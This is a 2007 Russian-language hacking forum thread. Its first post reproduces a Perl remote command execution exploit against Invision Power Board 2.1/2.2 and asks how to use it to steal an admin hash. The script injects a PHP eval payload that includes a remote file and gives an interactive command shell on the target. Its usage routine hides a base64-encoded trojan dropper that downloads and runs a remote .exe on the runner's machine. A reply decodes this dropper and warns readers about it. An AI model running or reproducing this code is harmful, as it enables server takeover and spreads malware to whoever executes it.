Форумы Invision Power Board 2.1.* and 2.2.* commands execution exploit

Discussion in 'Уязвимости CMS/форумов' started by Mr. Zlodey, 22 Oct 2007.

  1. Mr. Zlodey

    Mr. Zlodey New Member

    Joined:
    22 Oct 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Плз помогите разобраться, как пользоваться этим скриптом :)

    Code:
    #!/usr/bin/perl
    
    ## Invision Power Board 2.1.* and 2.2.* commands execution exploit
    ## keep on private!!!
    ## vulnerable versions <= 2.2.2
    ## tested on 2.1.7, 2.2.2
    ## coded by Nutter
    
    
    use IO::Socket;
    use Getopt::Std;
    use MIME::Base64;
    
    getopts("h:d:f:v:c:");
    
    $host     = $ntt_h;
    $dir      = $ntt_d;
    $forum    = $ntt_f;
    $version  = $ntt_v || 0;
    $cmd      = $ntt_c;
    
    $|++;
    
    header();
    if(!$host||!$dir||!$forum||!$cmd) { usage(); }
    
    print "[~]    SERVER : $host\r\n";
    print "[~]      PATH : $dir\r\n";
    print "[~]     LOGIN : $forum\r\n";
    print "[~]  PASSWORD : $version\r\n";
    print "[~]    TARGET : $cmd";
    print (($version)?(' - IPB 2.1.*'):(' - IPB 2.2.*'));
    print "\r\n";
    
    print "[~] Connecting ... ";
    
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    $login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $post     = 'UserName='.$login.'&PassWord='.$password;
    $loggedin = 0;
    print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    while (<$sock>)
    {  
     if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
    }
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    print $sock "GET ${dir}index.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n\r\n";
    while (<$sock>)
    {    
     if(/act=Login&amp;CODE=03/) { $loggedin = 1; last; }
    }
    if($loggedin) { print " [ DONE ]\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    print "[+] SID: $sid\r\n";
    
    print "[~] Try get md5_check ...";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    if($version==1)
     {
     print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
     }
    else
     {
     print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
     }
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n\r\n";
    while (<$sock>)
     {  
     if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }
     if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
     }
    close($sock);
    if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    print "[~] Create new message ...";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    $created = 0;
    $text = 'relixhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
            '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
    $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
    print $sock "POST ${dir}index.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    while (<$sock>)
     {  
     if(/Location:/) { $created = 1; last; }
     }
    if($created) { print " [ DONE ]\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    print "[~] Search message ...";
    $post = 'keywords=relixhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
    print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    
    while (<$sock>)
     {
     if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
     }
    
    if($searchid) { print " [ DONE ]\r\n"; }
    else { print "[ FAILED ]\r\n"; exit(); }
    print "[+] SEARCHID: $searchid\r\n";
    
    $get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
    
    while ()
     {
        print "Command for execute or 'locker'";
        while(<STDIN>)
         {
            $cmd=$_;
            chomp($cmd);
            exit() if ($cmd eq 'exit');
            last;
         }
        &run($cmd);
     }
    
    sub run()
     {
      $cmd =~ s/(.*);$/$1/eg;
      $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
      $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
      $cmd2 .= $cmd;
      $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
      $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
      
      print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
      print $sock "Host: $host\r\n";
      print $sock "Cookie: session_id=$sid;\r\n";
      print $sock "Connection: close\r\n\r\n";
    
      $on = 0;
      $runned = 0;
      while ($answer = <$sock>)
       {
        if ($answer =~ /^_END_/) { return 0; }
        if ($on == 1) { print "  $answer"; }
        if ($answer =~ /^_START_/) { $on = 1; }
       }
     }
     
    sub header()
     {
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";   
     print " Greets: Nick,colors,genad++,Great,Winux,bushad\r\n";
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     }
     
    sub usage()
     {
     my $mp='DQoNCnVzZSBMV1A6OlVzZXJBZ2VudDsNCm15ICR1YSA9IExXUDo6VXNlckFnZW50IC0+IG5ldzsN
    CiR1YSAtPiBnZXQoImh0dHA6Ly93d3cueW96aGlrLmNvbS91cGxvYWRlci91cGxvYWRzL3Ryb3kv
    MTIzLmV4ZSIsICc6Y29udGVudF9maWxlJyA9PiAiYzpcXGV4cC5leGUiKTsNCmV4ZWMoInN0YXJ0
    IGM6XFxleHAuZXhlIik7';
     print "exp.pl -h <host> -d <dir> -f <forum> -v <version> -c <command>\r\n\r\n";
     print "<host>     - host where IPB installed e.g www.ipb.com\r\n";
     print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";
     print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";
     print "<version>  - forum version:\r\n";
     print "             0 - 2.1.*\r\n";
     print "             1 - 2.2.*\r\n";
     print "<command>  - commands execution\r\n";
     eval(decode_base64($mp));
     exit();
     }
    
    1. При выполнении скрипта запрашивается файл "exp.exe" o_O
    2. Какую команду надо писать чтобы получить хэш админа?

    Заранее спасибо!
     
    #1 Mr. Zlodey, 22 Oct 2007
    Last edited: 22 Oct 2007
  2. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    729
    Likes Received:
    95
    Reputations:
    12
    устанавливаешь перл и вперед что тебе тут неясного? Испрвь ошибки если они есть
     
  3. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    729
    Likes Received:
    95
    Reputations:
    12
    вот чувак гавнюк использовать социальную инженерию. Смотрите что тут замутил не качайте сплоит
    он вам на комп скачивает файл и запускает его:

    use LWP::UserAgent;
    my $ua = LWP::UserAgent -> new;
    $ua -> get("http://www.yozhik.com/uploader/uploads/troy/123.exe", ':content_file' => "c:\\exp.exe");
    exec("start c:\\exp.exe");


    да и еще одно. Сплоит старый под ipb <2.1.5 (включительно)
     
    #3 heks, 22 Oct 2007
    Last edited: 22 Oct 2007
  4. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    729
    Likes Received:
    95
    Reputations:
    12
    а ниже ты видел что написал
    тебе это ни чего не говорит ? хоть и файла с вирусом там нет но все же лучше будет убрать из скрипта эти вот строчки
    my $mp='DQoNCnVzZSBMV1A6OlVzZXJBZ2VudDsNCm15ICR1YSA9I ExXUDo6VXNlckFnZW50IC0+IG5ldzsN
    CiR1YSAtPiBnZXQoImh0dHA6Ly93d3cueW96aGlrLmNvbS91cG xvYWRlci91cGxvYWRzL3Ryb3kv
    MTIzLmV4ZSIsICc6Y29udGVudF9maWxlJyA9PiAiYzpcXGV4cC 5leGUiKTsNCmV4ZWMoInN0YXJ0
    IGM6XFxleHAuZXhlIik7';
     
  5. FaR-G9

    FaR-G9 Member

    Joined:
    19 Dec 2006
    Messages:
    115
    Likes Received:
    28
    Reputations:
    -4
    Кажется в 2.1.5 эту багу уже исправили,
    темболее этот сплойт уже сколько раз поднимался на этом форуме, модеры АУ, где вы?
     
Loading...